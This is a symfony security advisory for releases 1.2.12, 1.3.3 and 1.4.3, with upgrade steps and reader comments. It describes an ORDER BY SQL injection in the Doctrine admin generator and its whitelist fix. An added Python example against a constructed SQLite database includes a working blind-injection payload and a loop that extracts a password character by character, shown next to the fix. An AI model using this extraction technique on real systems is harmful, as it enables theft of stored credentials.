
Security Release: 1.2.12, 1.3.3 and 1.4.3

A SQL injection vulnerability in the Doctrine admin generator was reported earlier today which has been addressed in these 1.2.12, 1.3.3 and 1.4.3 security releases. This vulnerability was limited to the Doctrine admin generator and did not affect the Propel admin generator or any other aspect of symfony's Doctrine integration.

We recommend all projects that use the Doctrine admin generator upgrade to these latest versions immediately.

The vulnerability

The admin generator in sfDoctrinePlugin was not properly filtering the GET request parameter that switches the sort order on record listing pages. By manipulating this parameter in the URL, it was possible to inject arbitrary SQL into the query that populates the list page. We have closed this hole by applying a simple whitelist filter which checks that this parameter is either "asc" or "desc," case-insensitive.
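To make the mechanics concrete, here is an added example in Python against an in-memory SQLite database. It is not symfony's or Doctrine's code, and the table names, columns, secret value and function names are all constructed for illustration. It shows why parameter binding cannot protect the ORDER BY position, how an attacker turns an unfiltered sort-direction parameter into a blind oracle on data they cannot otherwise read, and how the two-value whitelist described above closes the hole:

```python
import sqlite3


def make_db():
    # Constructed sample data: an admin list of posts plus a table holding a
    # secret the attacker has no direct way to read (not symfony's schema).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT, is_published INTEGER);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO post VALUES (1, 'first', 1), (2, 'second', 1), (3, 'third', 1);
        INSERT INTO user VALUES (1, 'admin', 's3cret');
    """)
    return conn


def list_ids_unsafe(conn, sort_dir):
    # VULNERABLE: the request parameter is pasted into the ORDER BY clause.
    # A bound placeholder cannot help here; ORDER BY takes SQL, not a value.
    sql = f"SELECT id FROM post ORDER BY is_published {sort_dir}"
    return [row[0] for row in conn.execute(sql)]


def normalize_sort_dir(value, default="asc"):
    # Whitelist filter: only "asc" or "desc", case-insensitive.
    # Falling back to the default on anything else is an assumption of this example.
    value = str(value).strip().lower()
    return value if value in ("asc", "desc") else default


def list_ids_safe(conn, sort_dir):
    # Hardened form: whatever the client sent, only "asc" or "desc" reaches the SQL.
    sql = f"SELECT id FROM post ORDER BY is_published {normalize_sort_dir(sort_dir)}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(position, guess):
    # Every listed row shares is_published=1, so the injected secondary sort key
    # decides the order: correct guess -> ids ascending, wrong guess -> descending.
    return (
        "asc, CASE WHEN (SELECT substr(password, %d, 1) FROM user WHERE id = 1) = '%s' "
        "THEN id ELSE -id END" % (position, guess)
    )


def extract_secret(conn, max_len=16, charset="abcdefghijklmnopqrstuvwxyz0123456789"):
    # Blind extraction: one character per position, read purely from row order.
    secret = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            if list_ids_unsafe(conn, oracle_payload(pos, ch)) == [1, 2, 3]:
                found = ch
                break
        if found is None:
            break  # past the end of the string: substr() yields '' and never matches
        secret += found
    return secret


if __name__ == "__main__":
    conn = make_db()
    # The attacker recovers the password through nothing but the sort parameter.
    print("leaked via ORDER BY:", extract_secret(conn))
    # With the whitelist in place the same payload is reduced to a plain "asc".
    print("hardened listing:", list_ids_safe(conn, oracle_payload(1, "s")))
```

The example keeps the sort column fixed; on a real list page it is also attacker-reachable and is likewise a SQL fragment rather than a bound value, so it needs its own whitelist of the column names the generator actually exposes.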

How to report a security issue

It behooves us all to review the process for reporting a security issue to the symfony core team. This process, described on the symfony wiki, is set aside from reporting other issues with the symfony code because security issues require special consideration. If you find a security vulnerability, please do not post to the symfony-users mailing list. Instead, send an email to security [at] symfony-project [dot] com describing the vulnerability and it will quickly be qualified and addressed. Once a fix is released, the vulnerability and fix will be announced on this blog.

How to upgrade

If you've checked out a tag from Subversion, switch to the latest one.

// symfony 1.2
$ svn switch

// symfony 1.3
$ svn switch

// symfony 1.4
$ svn switch

If you are using the PEAR package, the following will work for you.

// symfony 1.2
$ pear upgrade symfony/symfony-1.2.12

// symfony 1.3
$ pear upgrade symfony/symfony-1.3.3

// symfony 1.4
$ pear upgrade symfony/symfony-1.4.3

Once that's complete, clear your project's cache.

$ php symfony cache:clear

If you'd prefer to download the security fix as a patch, you may do so for the 1.2, 1.3 or 1.4 branches.



Please update the page, since it's still referring to 1.4.2 as the latest release.
Download 1.4.3 from

I've updated the post with more detail on the vulnerability itself and our fix.

I think you should put the name of the person discovering the security hole in the blog entry.
As a courtesy to the reporter.

You are right, but - roko didn't disclose a real name. So? Who is roko?

I hijacked Kris's post and added some information for symfony 1.2.
While 1.2.11 is not supported anymore, we of course also fixed this issue in 1.2.12.
